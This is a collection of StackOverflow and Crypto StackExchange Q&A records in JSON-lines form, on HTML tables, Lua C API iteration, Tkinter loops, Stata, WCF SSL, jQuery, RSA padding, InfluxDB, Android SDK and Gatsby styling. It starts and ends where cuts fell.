id=\"crosstable\" border =1 cellpadding=\"6px\" style=\"margin-top: 30px;TEXT-ALIGN: left;float:left;width:1200px;BORDER-COLLAPSE: collapse;\">\n<thead>\n<tr>\n<th colspan=\"9\" style=\"text-align: center;\">\n<span style=\"color: #1b4a84;font-size: 14px;font-weight: 900;\">Response<\/span>\n<\/th>\n<th style=\"text-align: right;\">\nDownload\n<\/th>\n<\/tr>\n<tr style=\"color: white; background-color: rgb(31, 73, 125);\">\n<th style=\"width: 10%;\">Activity Code<\/th>\n<th style=\"width: 10%;\">No of Completed Associates<\/th>\n<th style=\"width: 10%;\">No of Participants Submitted Feedback<\/th>\n<th style=\"width: 7%;\">Instructor<\/th>\n<th style=\"width: 7%;\">Courseware<\/th>\n<th style=\"width: 7%;\">Environment<\/th>\n<th style=\"width: 8%;\">Learner Support<\/th>\n<th style=\"width: 7%;\">Overall<\/th>\n<th style=\"width: 10%;\">Overall Activity Feedback<\/th>\n<th style=\"width: 8%;\">Overall Activity NPS<\/th>\n<\/tr>\n<\/thead>\n<\/table>\n<table id=\"crosstable\" border =1 cellpadding=\"6px\" style=\"TEXT-ALIGN: left;float:left;width:1200px;BORDER-COLLAPSE: collapse;display: block;max-height: 50px;overflow-y: auto;\">\n<tbody>\n<tr style=\"color: rgb(31, 73, 125); background-color: white;\">\n<td style=\"width: 10%;\">\nActivity_Code1\n<\/td>\n<td style=\"width: 10%;\">No_\n<wbr>of_\n<wbr>Completed_\n<wbr>Associates\n<\/td>\n<td style=\"width: 10%;\">No_\n<wbr>of_\n<wbr>Participants_\n<wbr>Submitted_\n<wbr>Feedback\n<\/td>\n<td style=\"width: 7%;\">Instructor<\/td>\n<td style=\"width: 7%;\">Courseware<\/td>\n<td style=\"width: 7%;\">Environment<\/td>\n<td style=\"width: 8%;\">Learner_\n<wbr>Support\n<\/td>\n<td style=\"width: 7%;\">Overall<\/td>\n<td style=\"width: 10%;\">Overall_\n<wbr>Activity_\n<wbr>Feedback\n<\/td>\n<td style=\"width: 8%;\">Overall_\n<wbr>Activity_\n<wbr>NPS\n<\/td>\n<\/tr>\n<tr style=\"color: rgb(31, 73, 125); background-color: rgb(220, 230, 241);\">\n<td>\nActivity_Code2\n<\/td>\n<td>No_\n<wbr>of_\n<wbr>Completed_\n<wbr>Associates\n<\/td>\n<td>No_\n<wbr>of_\n<wbr>Participants_\n<wbr>Submitted_\n<wbr>Feedback\n<\/td>\n<td>Instructor<\/td>\n<td>Courseware<\/td>\n<td>Environment<\/td>\n<td>Learner_\n<wbr>Support\n<\/td>\n<td>Overall<\/td>\n<td>Overall_\n<wbr>Activity_\n<wbr>Feedback\n<\/td>\n<td>Overall_\n<wbr>Activity_\n<wbr>NPS\n<\/td>\n<\/tr>\n<tr style=\"color: rgb(31, 73, 125); background-color: white;\">\n<td>\nActivity_Code3\n<\/td>\n<td>No_\n<wbr>of_\n<wbr>Completed_\n<wbr>Associates\n<\/td>\n<td>No_\n<wbr>of_\n<wbr>Participants_\n<wbr>Submitted_\n<wbr>Feedback\n<\/td>\n<td>Instructor<\/td>\n<td>Courseware<\/td>\n<td>Environment<\/td>\n<td>Learner_\n<wbr>Support\n<\/td>\n<td>Overall<\/td>\n<td>Overall_\n<wbr>Activity_\n<wbr>Feedback\n<\/td>\n<td>Overall_\n<wbr>Activity_\n<wbr>NPS\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div><\/code>\n\nAny suggestions to make this correct. I need freeze header effect so can't use the same table to adjust the width.\nThanks it worked but still have some minor alignment issue when the auto scroll comes into the picture. Is there any way to adjust that one too in the code.\nAnswer: \n\n<code><div style=\"position: fixed;background:#fff;z-index: 999;\">\n <table id=\"crosstable\" cellpadding=\"6px\" border=1 style=\"margin-top: 30px;TEXT-ALIGN: left;width:1200px;\">\n <tbody>\n <tr>\n <td colspan=\"9\" style=\"text-align: center;\">\n <span style=\"color: #1b4a84;font-size: 14px;font-weight: 900;\">L1 Feedback Response<\/span>\n <\/th>\n <td style=\"text-align: right;\">\n <a onclick=\"download excel("default","default","AC")\">\n <img src=\"\/pentaho-style\/1235\/images\/excel icon.png\" title=\"Download\" style=\"height: 24px;\">\n <\/a>\n <\/th>\n <\/tr>\n <tr style=\"color: white;background-color: rgb(31, 73, 125);\/* position: fixed; *\/\">\n <td style=\"width: 10%;\">Activity Code<\/th>\n <td style=\"width: 10%;\">No of Completed Associates<\/th>\n <td style=\"width: 10%;\">No of Participants Submitted Feedback<\/th>\n <td style=\"width: 7%;\">Instructor<\/th>\n <td style=\"width: 7%;\">Courseware<\/th>\n <td style=\"width: 7%;\">Environment<\/th>\n <td style=\"width: 8%;\">Learner Support<\/th>\n <td style=\"width: 7%;\">Overall<\/th>\n <td style=\"width: 10%;\">Overall Activity Feedback<\/th>\n <td style=\"width: 8%;\">Overall Activity NPS<\/th>\n <\/tr>\n <\/tbody>\n <\/table>\n<\/div>\n\n<div style=\"padding-top:125px;\">\n <table id=\"crosstable\" cellpadding=\"6px\" border=1 style=\"TEXT-ALIGN: left;max-height: 500px;width:1200px;\">\n <tbody>\n <tr style=\"color: rgb(31, 73, 125); background-color: white;\">\n <td style=\"width: 10%;\">\n Activity Code2\n <\/td>\n <td style=\"width: 10%;\">No_<wbr>of_<wbr>Completed_<wbr>Associates<\/td>\n <td style=\"width: 10%;\">No_<wbr>of_<wbr>Participants_<wbr>Submitted_<wbr>Feedback<\/td>\n <td style=\"width: 7%;\">Instructor<\/td>\n <td style=\"width: 7%;\">Courseware<\/td>\n <td style=\"width: 7%;\">Environment<\/td>\n <td style=\"width: 8%;\">Learner_<wbr>Support<\/td>\n <td style=\"width: 7%;\">Overall<\/td>\n <td style=\"width: 10%;\">Overall_<wbr>Activity_<wbr>Feedback<\/td>\n <td style=\"width: 8%;\">Overall_<wbr>Activity_<wbr>NPS<\/td>\n <\/tr>\n <\/tbody>\n <\/table>\n<\/div><\/code>\n\n<code><td><\/code> content with \"underscores\" like <code>No_of_Participants_Submitted_Feedback<\/code> are unbreakable, therefore it would push the width of the columns. So you might want to use space instead of underscores.\nIf you must have the underscores, add <code><wbr><\/code> after every underscore like this <code>No_<wbr>of_<wbr>Participants_<wbr>Submitted_<wbr>Feedback<\/code>.\nAlso note that you missed <code>%<\/code> in <code><td style=\"width: 7;\">Environment<\/td><\/code>.\nJust by doing this, you would see a huge change in your result, then you can tweak your codes to match perfectly.\nComment: how to avoid the width to push even though underscores are present ?\nComment: Add `` after every \"underscore\" like this `No_of_Completed_Associates`\nComment: It working but stil some align issue is there... you can preview in code snippet\nComment: I've added code snippet. Note that `position:fixed` would only works for vertical scroll and won't work for horizontal scroll.\nComment: Hi i have updated the code, now just minor scroll issue can be adjust that one too ?\n","meta":{"source":"stackoverflow","title":"HTMl Table Width issue when added new table below to show effect like freeze pane","dup_signals":{}},"subset":"stackexchange"} +{"text":"Iterate a lua table in c with a custom pair function\n\nQuestion: I'd like to use the Ordered Table Simple example, I found at the lua-wiki site. Here's the link.\nIn Lua it iterates fine with this:\n<code>for i,v in t:opairs() do\n print( i,v )\nend\n<\/code>\nInstead iterating in lua, I want pass <code>t<\/code> to a C method and iterate the table there. In the C API I found only <code>lua_next<\/code> for the original <code>pairs<\/code> iterator. How can I iterate this lua code in C ?\nAnswer: What you can do is write a custom <code>next<\/code> C function that mimics <code>lua_next<\/code> but works on that ordered table instead having <code>opairs<\/code> method.\n<code>int luaL_orderednext(luaState *L)\n{\n luaL_checkany(L, -1); \/\/ previous key\n luaL_checktype(L, -2, LUA_TTABLE); \/\/ self\n luaL_checktype(L, -3, LUA_TFUNCTION); \/\/ iterator\n lua_pop(L, 1); \/\/ pop the key since \n \/\/ opair doesn't use it\n\n \/\/ iter(self)\n lua_pushvalue(L, -2);\n lua_pushvalue(L, -2);\n lua_call(L, 1, 2);\n\n if(lua_isnil(L, -2))\n {\n lua_pop(L, 2);\n return 0;\n }\n return 2;\n}\n<\/code>\nYou can then use it in C similar to <code>lua_next<\/code>:\n<code>int orderedtraverse(luaState *L)\n{\n lua_settop(L, 1);\n luaL_checktype(L, 1, LUA_TTABLE);\n\n \/\/ t:opairs()\n lua_getfield(L, 1, \"opairs\");\n lua_pushvalue(L, -2);\n lua_call(L, 1, 2);\n\n \/\/ iter, self (t), nil\n for(lua_pushnil(L); luaL_orderednext(L); lua_pop(L, 1))\n {\n printf(\"%s - %s\\n\", \n lua_typename(L, lua_type(L, -2)), \n lua_typename(L, lua_type(L, -1)));\n }\n return 0;\n}\n<\/code>\nNote, I didn't test this but it should work.\n","meta":{"source":"stackoverflow","title":"Iterate a lua table in c with a custom pair function","dup_signals":{}},"subset":"stackexchange"} +{"text":"Does Tkinter have a fixed or repeating update loop that I can use?\n\nQuestion: I have a GUI running in the main thread with a second thread constantly taking input from a shared Queue. Multiple background threads are doing different processes and the second thread takes all of their output and updates the GUI. So far, no problems have come about, but there are countless warnings Tkinter is not thread safe.\nWith that being the case, I can copy all of this code into another constant loop, but I can't find out where I could put it so it's also in the main thread and does not lock up the GUI. What is the right way to do this?\nThanks.\nComment: Tk and tkinter are more thread safe than some people claim. My experiments and issues on the tracker show that updating widgets in threads works much better on 3.x than with 2.x. That said, periodically reading a Queue to update widgets can probably be done more efficiently in an properly timed root.after function than in a separate thread as calling a function is faster than a thread switch.\nComment: @TerryJanReedy, could you elaborate a bit? I think I understand the after function after looking at the documentation, but the function populating the queue in a separate thread is doing so very quickly. So if I only read the queue every 50 or 100 ms, then I'd have to skip to the most recent entry of the queue for the widget to display accurately. Any suggestions on how to do that?\nComment: Searching SO for \"[tkinter] root.after\" will give you lots of example answers. ... If values are generated only for display, then the function should be slowed (by sleeping between values). For readability, 1 change per second is about the limit. For emptying a queue, see the queue for the 'I am empty' signal.\nAnswer: Tkinter has an event loop that runs. You can leverage that by writing a function that continuously adds itself to the event queue periodically.\nThe solution looks roughly like this:\n<code>def some_func():\n\n <do your work here>\n\n # call this function again in 1 second\n root.after(1000, some_func)\n<\/code>\nOnce you call it once, it will continue to be called once a second. In production code you'll need to add a bit of bulletproofing, such as checking a flag that gets set when the app is shutting down.\nThis isn't exactly recursion, so you don't have to worry about running out of stack space since all this does is adds a new job in the event queue to run no sooner than one second after it was placed in the queue.\nComment: So I tried running it with 0 and the program never launches. If I run it with 1, it works, but I was hoping it was something that just gets updated every time Tkinter is going through it's loop which should be a lot per second. My only comparison to what I want is game programming with unity, there's a function called Update() thats provided and it runs over and over and over again as long as the game is running.\nComment: @user3000724: using zero starves the system. It's so busy running your code that it doesn't have a chance to service normal events. From a practical standpoint, you shouldn't run it much faster than every 100ms or so, or your UI will appear to lag. There's a single event queue that gets processed by `mainloop` so you need to be mindful of that. Do you really need your function to run more than 1000 times per second?\nComment: If one saves the id returned by root.after (`global after_id; after_id = root.after(...)`), then one can call `root.after_cancel(after_id)` in the shutdown function. Seems cleaner to me.\nComment: @BryanOakley, I'm using paramiko for a large sftp transfer so I'm using a callback function. The function gets called very frequently (I have no idea how to estimate it if its 10 or 1000 times a second) where it just prints to console the % completed. I now have it pushing the int value to a Queue in a background thread and in the main gui thread It's setup to constantly read form the queue and use that int value to update a ttk.Progressbar. I'm not sure if there's a better system for it. Like I said, it works now, but if there's a cleaner way to do it, I want to learn it.\nComment: @user3000724: if all you're doing is updating a progress bar, once a second is plenty fast enough. Do you really think a user cares about the difference between 20 seconds remaining and 20.01 second remaining?\nComment: I agree with that, the problem is that I'm pushing data to a queue very quickly (a callback function), and if I only update every second, I think I would just have to flush the queue and get the most recent entry. Is there a trick for this?\n","meta":{"source":"stackoverflow","title":"Does Tkinter have a fixed or repeating update loop that I can use?","dup_signals":{}},"subset":"stackexchange"} +{"text":"How do I add extra years to a time series dataset using tsappend?\n\nQuestion: Consider the following example code:\n<code>clear\nset obs 20\n\ngenerate t = 2000 + _n\n\ntsset t, yearly\ntsappend, last(2025) tsfmt(ty)\n<\/code>\nThis crashes with the error below:\n<code>unknown function ty()\nr(133);\n<\/code>\nHowever, according to the Stata 15 documentation for tsappend, the <code>ty<\/code> argument to the <code>tsfmt<\/code> option should be supported (even though there is not actually a <code>ty()<\/code> function in Stata).\n\nI know I can do this with a little math and either the <code>add<\/code> option to <code>tsappend<\/code> or, separately, the <code>expand<\/code> command, but I am trying to figure out why the documentation does not function as described.\nI am using Stata\/MP 15.1 for Unix (Linux 64-bit x86-64), Revision 26 Aug 2019 but I get the same error on Stata\/MP 15.1 for Windows.\nAnswer: The help file and manual of the <code>tsappend<\/code> command in all recent versions of Stata clearly states:\n\n\"tsfmt(string) specifies the name of the Stata time-series function to use in converting the date specified in last() to an integer. The function names are\n tc (clock), tC (Clock), td (daily), tw (weekly), tm (monthly), tq (quarterly), and th (half-yearly).\"\n\nThe functions <code>tc()<\/code>, <code>td()<\/code> etc. are all convenience functions in Stata jargon. Given that no <code>ty()<\/code> convenience function exists, the item in the list you present is likely a typo.\nA look in the manuals shows that the <code>%ty<\/code> format is associated with the following functions:\n\n<code>y()<\/code> \n<code>year()<\/code>\n<code>yearly()<\/code>\n\nHere, the <code>y()<\/code> function (last table item in Building SIFs from components) can be used:\n<code>clear\nset obs 20\n\ngenerate t = 2000 + _n\n\ntsset t, yearly\ntsappend, last(2025) tsfmt(y)\n<\/code>\n<code>list\n\n +------+\n | t |\n |------|\n 1. | 2001 |\n 2. | 2002 |\n 3. | 2003 |\n 4. | 2004 |\n 5. | 2005 |\n |------|\n 6. | 2006 |\n 7. | 2007 |\n 8. | 2008 |\n 9. | 2009 |\n 10. | 2010 |\n |------|\n 11. | 2011 |\n 12. | 2012 |\n 13. | 2013 |\n 14. | 2014 |\n 15. | 2015 |\n |------|\n 16. | 2016 |\n 17. | 2017 |\n 18. | 2018 |\n 19. | 2019 |\n 20. | 2020 |\n |------|\n 21. | 2021 |\n 22. | 2022 |\n 23. | 2023 |\n 24. | 2024 |\n 25. | 2025 |\n +------+\n<\/code>\nFor learning purposes, inspection of the source code for <code>tsappend<\/code> can confirm why this in fact works.\nIn the <code>_tsappend3<\/code> sub-command, which handles this combination of options we see that:\n<code>local lastt `=`tsfmt'(`last')'\n<\/code>\nFor <code>tsfmt()<\/code> specified as <code>y<\/code> we then get:\n<code>local lastt `=y(2025)'\n<\/code>\nThis is equal to <code>2025<\/code> - type <code>display y(2025)<\/code> to confirm.\nFurther down the code we also see the following:\n<code>gen `add' = max((`lastt' - `tmax') \/ `delta' + 1, 1) if `touse'\n<\/code>\nThe generated variable is then used to <code>expand<\/code> the dataset.\n","meta":{"source":"stackoverflow","title":"How do I add extra years to a time series dataset using tsappend?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Vista, inifiles, and run at startup oddities... what the heck\n\nQuestion: I've got something happening with a little app that I made that I don't understand what the problem is. The app is just a little texted panel clock that sits above the taskbar on the second monitor. Settings are saved via inifile in the proper appdata folder, and the specs are saved properly, i.e. X and Y location, font, font style, etc.\nI wanted it to run automatically when Windows boots up, so yesterday I just dragged a shortcut to the Start | Programs | Startup folder. This morning when booting up, for a moment, it loaded in the proper location, then quickly moved itself back to 0 by 0 on the X-Y plane. I looked at the inifile, and sure enough... it's Top=1133 Left=1920, just like it is supposed to be, yet windows starts it at Top=0 Left=0.\nWhat the heck?...\nAnswer: Check that you have the 'position=poDesigned' as well. If you dont, it will use that setting preferentially. If this is ok, put a fixed offset in your X&Y properties to see if that is where it is defaulting to. Ideally you should be setting your desired XY position no earlier than AfterCreation, do it in FormCreate if you can because by that time the form is all yours to play with.\nBrian.\nComment: Brian, You Da Man!\n\nThanks a bunch, that was it, as I had originally set the position at poDefault. Now I can copy and paste from the clipboard - the date, time, date and time, etc to my hearts content. :)\n","meta":{"source":"stackoverflow","title":"Vista, inifiles, and run at startup oddities... what the heck","dup_signals":{}},"subset":"stackexchange"} +{"text":"Self Hosted WCF SSL\n\nQuestion: Just a quickie.\nI am not sure how to approach securing a self hosted WCF service with an SSL certificate. When buying an SSL certificate, I need to do a certificate request based on the FQDN.\nUsing a self hosted WCF service,\n\nHow do I generate a certificate request for a self hsoted WCF service?\nHow do I implement the F.Q.D.N. for a certificate for a self hosted service? The self hsoted service is accessed on a dynamic DNS name and a port.\n\nShould I just generate a self signed certificate and use that?\nRegards\nAnswer: The following link demonstrates the process and enumerates the steps for establishing a certificate signing request.\nhttp:\/\/technet.microsoft.com\/en-us\/library\/ff625722(v=ws.10).aspx \nWe specify the following for our self-hosted WCF SSL services: \nOn the Subject tab:\n1. In the Subject name area under Type, click Common Name.\n2. In the Subject name area under Value, enter the fully qualified domain name, and then click Add.\n3. In the Alternative name area under Type, click DNS.\n4. In the Alternative name area under Value, enter the fully qualified domain name, and then click Add. \nOn the Extensions tab:\n1. Click the Key usage arrow. In the Available options list, click Digital signature, and then click Add. Click Key encipherment, and then click Add.\n2. Click the Extended Key Usage (application policies) arrow. In the Available options list, click Server Authentication and Client Authentication, and then click Add.\nAnswer: The SSL certificate has two parts to it that you need to know about. The first is the host. This is sent back to the client, so they can verify that the SSL certificate is for what you THINK you were connecting to.\nSo your host name NEEDS to match the address you are using to connect to the WCF service.\nThe second part is the signature. This is to verify the SSL certificate has not been changed since it was issued. Think of it as a Counter Signature on your rental agreement.\nNow what a Self Signed certificate means...well its exactly what it says on the tin. Your computer signed it. Where as normally you would pay a Certificate Authority to sign it (think of it like getting a Judge to Counter Sign your rental agreement).\nSo the down side of the Self Signed cert is that no one trusts it, and for good reason.\nFor 99% of cases, your self signed cert is not going to be trusted by anyone.\n","meta":{"source":"stackoverflow","title":"Self Hosted WCF SSL","dup_signals":{}},"subset":"stackexchange"} +{"text":"JQuery - converting JS to JQuery for generating table that allows parsing URL parameters\n\nQuestion: I have a problem with transforming my vanilla JS code to JQuery. I need to take parameter values from URL.\nFor example: \n\nlocalhost:63342\/2018-11-13-html\/form_sent.html?phone=4325325235&adress=testadress&order=book1&order=book2&deliverydate=datadostawy&deliverymethod=chinamail&agree=on\n\nMy current attempt is producing [Object object] in place of the values it's supposed to be throwing out.\n<code>function createSimpleRow(header, value) {\n const urlParams = new URLSearchParams(window.location.search);\n return $(\"<tr><\/tr>\").append($(\"<th><\/th>\").text(header)).append($(\"<td><\/td>\").text(`${urlParams.getAll(value)}`));\n}\n\nfunction readBookOrder(booklist) {\n const list = document.getElementById(booklist);\n const table = document.createElement(\"table\");\n\n table.append(createSimpleRow(\"phone\", `phone`));\n table.append(createSimpleRow(\"adress\", `adress`));\n\n list.appendChild(table);\n return list;\n}\n<\/code>\nMy old code is a mix of Jquery and pure JS and it seems to be working correctly, giving out all the values I've specified to take from the URL.\n<code>function readBookOrder(booklist) {\n const list = document.getElementById(booklist);\n const table = document.createElement(\"table\");\n\n const tr = document.createElement(\"tr\");\n const td1 = document.createElement(\"td\");\n td1.innerHTML = `${urlParams.get(\"phone\")}`;\n tr.appendChild(td1);\n const td2 = document.createElement(\"td\");\n td2.innerHTML = `${urlParams.get(\"adress\")}`;\n tr.appendChild(td2);\n const td3 = document.createElement(\"td\");\n td3.innerHTML = `${urlParams.getAll(\"order\")}`;\n tr.appendChild(td3);\n const td4 = document.createElement(\"td\");\n td4.innerHTML = `${urlParams.get(\"deliverydate\")}`;\n tr.appendChild(td4);\n const td5 = document.createElement(\"td\");\n td5.innerHTML = `${urlParams.get(\"deliverymethod\")}`;\n tr.appendChild(td5);\n\n table.appendChild(tr);\n list.appendChild(table);\n return list;\n}\n<\/code>\nCan someone suggest what is that I'm missing out during the convertion to the JQuery standard?\nComment: Because `createSimpleRow()` returns an jQuery context (which is basically on `Object` that encapsulates the nodes you created) that you're trying to `append()` to a native element. Try to append `[0]` at the end of your `return` statement to fix this\nAnswer: Since <code>createSimpleRow()<\/code> now returns a <code>jQuery<\/code> object you can't append that object directly with native DOM methods.\nConvert <code>readBookOrder()<\/code> to use <code>jQuery<\/code> methods instead that allow for inserting other jQuery objects\n<code>function readBookOrder(booklist) {\n const $list = $(`#${booklist}`);\n const $table = $(\"<table>\");\n\n ['phone', 'adress'].forEach(e => $table.append(createSimpleRow(e, e)) ); \n\n $list.append($table);\n return $list;\n}\n<\/code>\nThe convention of adding a <code>$<\/code> prefix to variable names is a common one to reflect that the variable contains a jQuery object\nComment: Thank you! Now I see why so many methods weren't working. Guess I have to learn quite a lot.\n","meta":{"source":"stackoverflow","title":"JQuery - converting JS to JQuery for generating table that allows parsing URL parameters","dup_signals":{}},"subset":"stackexchange"} +{"text":"'Unsupported template dependency: Upgrade your Android Eclipse plugin' with SDK Tools v22\n\nQuestion: I recently upgraded my Android SDK Tools to version 22. But whenever I am trying to create a new project in Eclipse, I get an error message:\n\nUnsupported template dependency: Upgrade your Android Eclipse plugin\n\nHow can I fix this problem?\nComment: The following link helped me evade the problem:\n\nhttp:\/\/stackoverflow.com\/questions\/18839428\/issues-when-create-new-android-application-project-in-eclipse\/18849033#18849033\nComment: Does your dialog show blank in the 'Required Version' field, which is what I'm seeing? It would explain why the upgrade version on the dialog doesn't do anything.\nAnswer: Download from http:\/\/dl-ssl.google.com\/android\/repository\/tools_r22-windows.zip, unzip it and replace the \/tools folder with this one to downgrade the sdk tools. There's a bug in version 22.\nFor Mac http:\/\/dl-ssl.google.com\/android\/repository\/tools_r22-macosx.zip\nFor Linux: http:\/\/dl-ssl.google.com\/android\/repository\/tools_r22-linux.zip\nComment: This left me with an error saying ...tools\/emulator not found, which went away when I copied 'emulator' from the 'bad' version of tools that I had moved out of the way. (OS X Mountain Lion by the way)\nComment: It's a *known* issue being worked at the moment. See https:\/\/code.google.com\/p\/android\/issues\/detail?id=60149 for progress and workaround discussion.\nComment: @user1681572 try again, it works for me on 10.7.5.\nAnswer: The project member posted comment #55 that solves this issue without downloading the SDK tools. Just download the activity templates and replace the <code>sdk\/tools\/templates\/activities<\/code> folder with the contents of the ZIP file.\nYou may need to restart Eclipse with the <code>-clean<\/code> option for it to work.\nComment: +1 for explaining the cause of this problem, thx. By the way, this answer would be more complete if you add a direct link to the file need to fix the problem.\nAnswer: From Eclipse go to Help > Check for updates and install any of the updates that Eclipse shows. \nOnce you update the SDK components you always usually need to update the Eclipse plugins as well. \nComment: This made no difference for me.\nComment: Run the SDK manager again and ensure everything is up to date, and run the eclipse updater again. Maybe https:\/\/code.google.com\/p\/android\/issues\/detail?id=60149 will also help\nAnswer: I started facing the same issue yesterday when I upgraded to the latest Android SDK Tools (22.2). So I reverted back the changes and am now using Android SDK Tool (22.0.5) and it works fine. \nTry downgrading Android SDK Tools.\n","meta":{"source":"stackoverflow","title":"'Unsupported template dependency: Upgrade your Android Eclipse plugin' with SDK Tools v22","dup_signals":{}},"subset":"stackexchange"} +{"text":"Adjust Image on Screen while Zoom Out\n\nQuestion: While zooming in the Image area goes out off screen. I want it to remain fixed in place\n\n<code><img style=\"margin-bottom:-10px;width:280px;height:280px;border-adius:50%\n;border:3px solid white\" id=\"image\" src=\"@Model.Image\" \/> <br \/>\n\n<a id=\"editbutton\" href=\"#\"><i style=\"border:3px solid white;border-radius:80%;\n padding:12px;z-index:5000;background-color:#128edb;font-size:15px;margin-left:40%;margin-top:-200px;color:white;\" class=\"fa fa-pencil\"><\/i><\/a> <\/code>\n\nenter image description here\nComment: Can you replicate your problem in a code snippet?\nComment: Please explain what is your requirement well\nComment: Image should not go out off screen while I zoom Out\nComment: Its size should be reduced only but remain fix in its position\nAnswer: You need to make some changes in your css and html .Please check the below snippet code.\nYou can adjust the edit icon position with change the <code>right<\/code> and <code>bottom<\/code> value in <code>#editbutton<\/code> element.\n\n<code>.imgWrap{position:relative;width:280px;height:280px;}\n#editbutton{position:absolute;right:-20px;bottom:-20px}<\/code>\n<code><div class=\"imgWrap\">\n<img style=\"margin-bottom:-10px;width:280px;height:280px;border-adius:50%\n;border:3px solid white\" id=\"image\" src=\"@Model.Image\" \/> <br \/>\n\n<a id=\"editbutton\" href=\"#\"><i style=\"border:3px solid white;border-radius:80%;\n padding:12px;background-color:#128edb;font-size:15px;color:white;\" class=\"fa fa-pencil\"><\/i><\/a>\n <div><\/code>\n\nIt will helps you. :)\n","meta":{"source":"stackoverflow","title":"Adjust Image on Screen while Zoom Out","dup_signals":{}},"subset":"stackexchange"} +{"text":"Can duplication of encrypted characters lead to a weakness in RSA?\n\nQuestion: Of course, I know RSA is to widely used and tested to have any legitimate threats, but I still am confused by this.\nI have been trying to implement C++ (in a effort to learn how it works, not to be used in production), and I stumbled upon a C++ program online. When I run the program, it generates two random primes and uses it in the algorithm. The problem is that when the encrypted data goes by, each encrypted character is the same. Now, is this an implementation problem, or something else? Can someone please explain why this isn't considered a vulnerability?\nAn example - \n<code>YOUR TWO RANDOM PRIMES ARE 117 AND 127\n\nENTER A MESSAGE TO ENCRYPT: hello\n\nENCRYPTED: \n3146\n3221\n11184\n11184\n1662\n<\/code>\nNow, obviously an attacker (MiTM, to the best of my knowledge) can conclude that in the message, the third and fourth character in the message are the same.\nTo repeat, is this a problem with the RSA implementation? Is it overlooked because no one can logically conclude <code>11184<\/code> is <code>l<\/code>?\nEDIT: I am aware that 117 and 127 are extremely to low to be used in anything that needs to be secure. The actual primes aren't relavant to my question unless they have something to do with why 11184 and 11184 are the same.\nAnswer: \nTo repeat, is this a problem with the RSA implementation?\n\nIt would certainly not be overlooked; it would be considered a serious security issue.\nInstead, it is an issue with this implementation; there are two ways this implementation isn't realistic:\nFor one, the primes is uses are extremely tiny. Real implementations use primes that may be over 300 digits each (actually, we usually state the size of the primes in bits, not digits); with that, we can encrypt moderate sized messages directly; the string \"hello\" would easily fit.\nFor another (and more relevant), we always use randomized padding before doing RSA encryption. That is, we don't give the string directly to the low level RSA function (which would have nonobvious security issues); instead, we convert the string into large integer, and include a number of random bits; these random bits mean that, even if we encrypt the same string multiple times, we'll always end up with different integers (and so at the end, every RSA encryption will look different).\nAnswer: You are encrypting one character at a time and not padding or adding randomness. \nThis is not a secure way of using RSA or in fact any cipher. Though normally we don't apply RSA to the message directly but rather use a symmetric cipher first and only use assymetric ciphers for the key. More important is padding. \nAny time you use RSA you want to add random padding to prevent not only identifying repeating but also related plain texts. \nTry reading about: https:\/\/en.wikipedia.org\/wiki\/Optimal_asymmetric_encryption_padding \nWhich will protect against identifying repeat encryption of same message as well as many other potential attacks which may be possible with no\/naive padding. This gives an all or nothing, if you don't have all of the padded message you can't get any information about the pre padding message.\n","meta":{"source":"crypto.stackexchange","title":"Can duplication of encrypted characters lead to a weakness in RSA?","dup_signals":{}},"subset":"stackexchange"} +{"text":"influxdb: how to filter query by stddev\n\nQuestion: I tried to filter out incorrect peaks from my temperature measurements. For instance I have a mean of 15\u00b0C with little variation. But sometimes my sensor sends 0\u00b0C or 4\u00b0C, which is a sending error. I tried\n<code>select temperature from \"sensor\" where temperature > mean(temperature) - stddev(temperature)<\/code>\nthis seems to work. However, the upper bound does not:\n<code>select temperature from \"sensor\" where temperature < mean(temperature) + stddev(temperature)<\/code>\nThis simply reveals\n\nSuccess! (no results to display)\n\nEven worse is that\n<code>select temperature from \"sensor\" where temperature < max(temperature)<\/code>\nalso reveals\n\nSuccess! (no results to display)\n\nwhich seems to be a bug to me. Any suggestions?\nComment: > this seems to work. \n\nIt is not working. The query was not malformed and was properly received, so the Admin UI is reporting \"Success\" but the \"No results to display\" means that nothing matched your query results.\n\nFunctions are not valid outside of the SELECT clause. It seems like a bug in the Admin UI that it is not reporting a syntax error.\n\nI would recommend using the [CLI](https:\/\/docs.influxdata.com\/influxdb\/v0.11\/tools\/shell\/) for all queries, as the Admin UI obscures too many things.\nAnswer: It sounds like what you want is \n<code>SELECT temperature FROM sensor WHERE temperature > 4<\/code>\nTo accomplish your original goal of using a STDDEV and MEAN to eliminate out of scope values, look into Kapacitor. It is the batch\/stream processing companion to InfluxDB and supports arbitrary user defined functions, as well as maintaining state over time. There are no subfunctions or HAVING clause yet in InfluxDB, so it cannot do what you desire.\n","meta":{"source":"stackoverflow","title":"influxdb: how to filter query by stddev","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to set padding of Gatsby Link Component to 0px with styled-components\n\nQuestion: I have made some style changes to the Gatsby Link component using styled-components. However for some reason, when i try to apply a padding of 0px, it still leaves a tiny space (few px) above\/below the text (between text and top\/bottom border). I used gatsby-default-starter in a codesandbox for the initial build. \nHTML\/CSS Env (codepen.io):\nhttps:\/\/codepen.io\/marti2221\/pen\/mNVJWZ\nGatsby Env (codesandbox):\nhttps:\/\/codesandbox.io\/s\/gatsby-paddinglink-spacing-gedtq\nI have tried applying padding via styled-components in a Gatsby environment, as well as a normal html\/css environment. When padding is set to 0px on the \"a\" tag in css\/html environment, there is no space around the text, as expected. However when i attempt to add the same padding to the gatsby Link component or even a regular a tag, in a gatsby environment, there is a tiny space between the text and my border. This leads to a larger padding on top\/bottom for my BtnLink than expected. I could adjust my padding accordingly, but i would like to know the root cause of this issue. \n<code> const StyledLink = styled(Link)`\n display: inline-block;\n font-family: sans-serif;\n border-radius: 25px;\n padding: 0px;\n text-decoration: none;\n border: 2px solid green;\n `\n const StyledA = styled.a`\n display: inline-block;\n font-family: sans-serif;\n border-radius: 25px;\n padding: 0px;\n text-decoration: none;\n border: 2px solid green;\n `\n\n const BtnLink = props => (\n <StyledLink {...props}>{props.children}<\/StyledLink>\n )\n\n const IndexPage = () => (\n <Layout>\n <BtnLink to=\"page-2\">Request Quote<\/BtnLink>\n <StyledA href=\"page-2\">Request Quotes<\/StyledA>\n <Link to=\"page-2\">Link<\/Link>\n <\/Layout>\n )\n<\/code>\nMy desired result is a gatsby Link component that can be styled the same as a regular link element (ie. 0px padding). My result is link text with some spacing around it in the Gatsby environment. When tested with regular HTML\/CSS, results are as expected (no spacing when padding is set to 0px)\nComment: Did you solve this?\nAnswer: You've already made a <code>styled(Link)<\/code> styledComponent, and saved it to the const 